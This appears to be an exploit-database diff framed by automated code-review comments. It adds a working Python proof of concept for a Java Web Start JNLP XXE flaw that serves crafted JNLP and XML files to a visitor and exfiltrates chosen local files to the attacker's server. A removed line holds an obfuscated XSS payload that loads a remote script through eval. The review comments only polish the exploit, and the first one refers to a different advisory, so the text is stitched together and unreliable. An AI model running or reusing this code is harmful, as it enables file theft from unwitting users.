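Review bot: The `# Version: N/A` line contradicts the entry's own title, which names release 2.3.0 of Ingenious School Management System; one of the two should be corrected so the affected version is recorded consistently. The description line `# The vulnerability allows an student,teacher upload arbitrary file....` is also ungrammatical and would read better as `# The vulnerability allows a student or teacher user to upload arbitrary files.`, which states the same thing.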


-<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
+
diff --git a/platforms/xml/webapps/43103.py b/platforms/xml/webapps/43103.py
new file mode 100755
index 000000000..97c1fab98
--- /dev/null
+++ b/platforms/xml/webapps/43103.py
@@ -0,0 +1,158 @@
+#!/usr/local/bin/python
+"""
+Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability
+Affected: <= v8u131
+File: jre-8u131-windows-i586-iftw.exe
+SHA1: 85f0de19845deef89cc5a29edebe5bb33023062d
+Download: http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html
+References: SRC-2017-0028 / CVE-2017-10309
+Advisory: http://srcincite.io/advisories/src-2017-0028/
+
+Vulnerability Details:
+======================
+
+Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'.
+This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack to be leveraged to disclose files, cause a denial of service or trigger SSRF.
+
+Notes:
+======
+
+- It will take a few seconds to fire.
+- Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all.
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py
+
+ Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
+ mr_me 2017
+
+(+) usage: ./poc.py
+(+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
+
+saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt'
+
+ Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability
+ mr_me 2017
+
+(+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, tap0: vmnet8
+(+) starting xxe server...
+(+) have someone with Java SE installed visit: http://172.16.175.1:9090/
+(!) firing webstart...
+(!) downloading jnlp...
+(!) downloading si.xml...
+(+) stolen: Please%20refer%20to%20http://java.com/licensereadme +^C(+) shutting down the web server +saturn:~ mr_me$ +""" + +import sys +import socket +import fcntl +import struct +from random import choice +from string import lowercase +from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler + +try: + import netifaces as ni +except: + print "(-) try 'pip install netifaces'" + sys.exit(1) + +class xxe(BaseHTTPRequestHandler): + + # stfu + def log_message(self, format, *args): + return + + def do_GET(self): + + if "leaked" in self.path: + print "(+) stolen: %s" % self.path.split("?")[1] + self.send_response(200) + self.end_headers() + + elif self.path == "/": + print "(!) firing webstart..." + self.send_response(200) + self.end_headers() + message = """ + + + + + + """ % (ip, path) + self.wfile.write(message) + self.wfile.write('\n') + + elif "si.xml" in self.path: + print "(!) downloading si.xml..." + self.send_response(200) + self.end_headers() + message = """ + + "> + """ % (file, ip) + self.wfile.write(message) + self.wfile.write('\n') + + elif path in self.path: + print "(!) downloading jnlp..." 
+ self.send_response(200) + self.end_headers() + message = """ + + + + %%sp; + %%param1; + %%exfil; + ]> + """ % ip + self.wfile.write(message) + self.wfile.write('\n') + return + +def banner(): + return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n""" + +if __name__ == '__main__': + + print banner() + + if len(sys.argv) != 2: + print "(+) usage: %s " % sys.argv[0] + print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0] + sys.exit(1) + + file = sys.argv[1] + + # randomize incase we change payloads and browser caches + path = "".join(choice(lowercase) for i in range(10)) + path += ".jnlp" + + # interfaces + ints = "" + for i in ni.interfaces(): ints += "%s, " % i + interface = raw_input("(+) select your interface: %s: " % ints[:-2]) + + # get the ip from the interface + try: + ip = ni.ifaddresses(interface)[2][0]['addr'] + except: + print "(-) no ip address associated with that interface!" + sys.exit(1) + print "jnlp://%s:9090/%s" % (ip, path) + try: + server = HTTPServer(('0.0.0.0', 9090), xxe) + print '(+) starting xxe server...' + print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip + server.serve_forever() + + except KeyboardInterrupt: + print '(+) shutting down the web server' + server.socket.close() \ No newline at end of file
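Review bot: The two bare `except:` clauses — around `import netifaces as ni` and around `ni.ifaddresses(interface)[2][0]['addr']` — swallow every exception, including KeyboardInterrupt and SystemExit, and collapse distinct failures (no IPv4 entry for the interface, a mistyped interface name) into the same message; narrow them to `except ImportError:` and `except (KeyError, IndexError):` so the real cause is still visible. In the `__main__` block, `server` is bound only after `HTTPServer(('0.0.0.0', 9090), xxe)` returns, so an interrupt during the bind makes the `except KeyboardInterrupt` handler raise NameError at `server.socket.close()` instead of printing the shutdown message, and a bind failure such as the port already being in use is not handled at all. The `socket`, `fcntl` and `struct` imports are unused, and `file` shadows the builtin. The hunk's indentation appears lost in this rendering, so these locations are given by statement rather than by column.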